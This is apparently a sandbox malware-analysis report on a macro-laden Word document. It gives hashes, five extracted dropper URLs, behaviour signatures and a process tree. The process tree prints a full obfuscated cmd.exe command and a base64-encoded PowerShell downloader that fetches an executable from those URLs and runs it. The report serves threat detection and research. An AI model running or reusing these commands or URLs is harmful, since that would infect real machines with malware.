Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
28/08/2024, 17:46
General
-
Target
c7583c3314352b95a859b1850241ec4c_JaffaCakes118.doc
-
Size
87KB
-
MD5
c7583c3314352b95a859b1850241ec4c
-
SHA1
686021b468397700f6cbba09d7374a4ba4a82afc
-
SHA256
6d1522b971a391ad16352b8cd205416729b99239fbc9101c43ad9c5b50f876c2
-
SHA512
f3ccbde93f73ddcd21c53219cd33b1563f051e76485d5bfe3715c46de712f7ac5f34ad17e01b32c485d0e1d1c61651ccb23089e38097fe2a4774a285c6737710
-
SSDEEP
1536:aptJlmrJpmxlRw99NBj+aIc0IvHsA99l:Gte2dw99f1UA99l
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://lw.mirkre.com/CdKQQ
exe.dropper
http://dent.doctor-korchagina.ru/Dkxxo
exe.dropper
http://ehisblogtutorial.tk/0SIC3
exe.dropper
http://fendy.lightux.com/BriMn5Vx
exe.dropper
http://founderspond.skyries.com/KkfYR
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c7583c3314352b95a859b1850241ec4c_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V^ ^ ^ /c " ^S^E^t ^KM^9^P==AA^IAACAgAAI^A^AC^AgA^AIAAC^A^g^AAI^AACA^g^A^AIA^AC^A^gA^A^I^AACA^9^BQf^As^H^AoB^wY^AQHA^hB^w^YA^0H^A^7^Aw^aA^EG^AlBgc^AI^G^A7^Aw^d^A^8^EAV^B^AJ^A^AC^AtBQ^ZAQHAJ^B^QL^AU^G^Ar^B^w^b^AY^HAuBQSAsD^A^p^A^wd^A^8^E^AV^BA^J^AAC^A^sAg^U^A^UE^A^1B^A^J^A^gCAl^B^AbA^kGA^G^BA^ZA^E^G^Av^B^A^bA4^G^A3^B^w^b^AQ^E^Au^AgaAcFAWB^AJ^A^s^HA^5^B^gc^A^QHA7^B^QKA^Y^FA^wBQcA^QCAg^Ag^bAkG^AgAg^U^AUEA1^B^A^J^AgC^Ao^BwY^AEGAlB^gcA8^G^A^m^Bw^OAcC^A^l^B^A^e^AUGAuA^w^JAsC^A^T^B^g^e^Ao^F^Ak^A^wKAcCAc^B^wJ^AsCAjB^Q^a^A^wG^AiBQd^A^AHA^6^A^gd^A^4^G^AlB^A^J^A0^D^A^3^B^w^TA^UFA^k^A^wO^AcCA^y^AwNAEDAnAA^IA0DA^gA^wUA^o^H^AaB^AJA^s^D^Ap^Aw^JA^A^EAnAAKA^QHAp^B^AbA^A^HA^TBg^L^AcCASB^QW^AY^GArBwS^A^8C^AtB^w^bA^M^GAu^A^wcA^U^GA^p^B^gcA^kH^Ar^Bwc^A^4CA^kBgb^A8^GA^wB^wcAI^H^Al^B^A^Z^A4^GA1^B^wb^A^Y^GAv^A^wL^A^oD^A^w^BA^dAQ^H^A^o^BAQ^AgHAW^BQN^A^4^G^ANBQaAI^HACB^wL^A0GAv^BwY^A4CA^4^B^QdA^QH^A^o^Bw^ZA^kGA^s^BgL^A^kH^A^kBg^b^AUG^AmBwLA8CA6^A^Ac^A^QH^A0^BAa^AAE^AzA^w^QA^kE^ATBAM^A8CAr^BA^d^A^4C^AsB^QY^A^kGA^y^B^wbAQHA1BAd^Ac^G^Av^B^A^b^A^IGA^zB^Q^aA^gGAl^B^w^L^A8CA6^AAcA^QH^A^0BA^a^A^AE^Av^BA^e^A^g^H^Ar^BAR^A8CA1^B^gc^A^4CAh^Bgb^Ak^GAnBQYA^g^GAj^B^gc^A8^GAr^BQLAIHAv^BA^dAM^G^Av^BA^ZA^4CA0^B^gbAU^G^Ak^B^w^LA^8CA6AAc^A^QHA^0B^A^aAA^EARBQ^U^A^s^EAkB^wQA^8CA^t^BwbA^MGAuA^Q^Z^AIHArB^gcA^kGAtB^g^L^Ac^H^A^sB^wL^A^8C^A^6A^AcAQHA^0B^A^a^AcCA9A^gV^A^A^HAxBA^JAsD^A0^Bgb^AU^G^A^pBA^bAME^AiBQZ^AcFA^u^AA^d^A^UGAOBA^I^A^QHA^jBQ^ZAoG^Ai^B^w^b^A^0C^A3^B^QZA4^G^A^9AgaAcFA^WBAJ^ e^-^ ^ll^ehsr^e^w^o^p& ^F^OR /^L %^M ^IN ( ^ 1^0^0^1^ ^ ^, -1^ ,^ ^ 0 )D^o Se^T xF=!xF!!^KM^9^P:~%^M, 1!&& i^F %^M ^Ls^S ^1 Ca^l^l %xF:^*^x^F^!^=% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JABWAFcAagA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABxAHAAVgA9ACcAaAB0AHQAcAA6AC8ALwBsAHcALgBtAGkAcgBrAHIAZQAuAGMAbwBtAC8AQwBkAEsAUQBRAEAAaAB0AHQAcAA6AC8ALwBkAGUAbgB0AC4AZABvAGMAdABvAHIALQBrAG8AcgBjAGgAYQBnAGkAbgBhAC4AcgB1AC8ARABrAHgAeABvAEAAaAB0AHQAcAA6AC8ALwBlAGgAaQBzAGIAbABvAGcAdAB1AHQAbwByAGkAYQBsAC4AdABrAC8AMABTAEkAQwAzAEAAaAB0AHQAcAA6AC8ALwBmAGUAbgBkAHkALgBsAGkAZwBoAHQAdQB4AC4AYwBvAG0ALwBCAHIAaQBNAG4ANQBWAHgAQABoAHQAdABwADoALwAvAGYAbwB1AG4AZABlAHIAcwBwAG8AbgBkAC4AcwBrAHkAcgBpAGUAcwAuAGMAbwBtAC8ASwBrAGYAWQBSACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABaAHoAUwAgAD0AIAAnADEANwAyACcAOwAkAFUATwB3AD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAFoAegBTACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJAB1AEUAUgAgAGkAbgAgACQAcQBwAFYAKQB7AHQAcgB5AHsAJABWAFcAagAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AEUAUgAsACAAJABVAE8AdwApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABVAE8AdwA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD54f5f723dbe08964251952287817aa384
SHA16f65899abb4569a7f53711ca1483b3dfdda87388
SHA256fff0b7f2cb6fb61a7315c50bc102ff962756a7fe488a3220c8c2fc6e06a820b2
SHA5124a28e313c1cce611af4b6de2c17e4e8aebb2ec6c8bbb246802312b68572b631614ae08a6c0d4ce429454f742a12adfdb566b766f40d7f72d1a406b75bbc786b0
-
Filesize
240KB
-
Filesize
352KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
44KB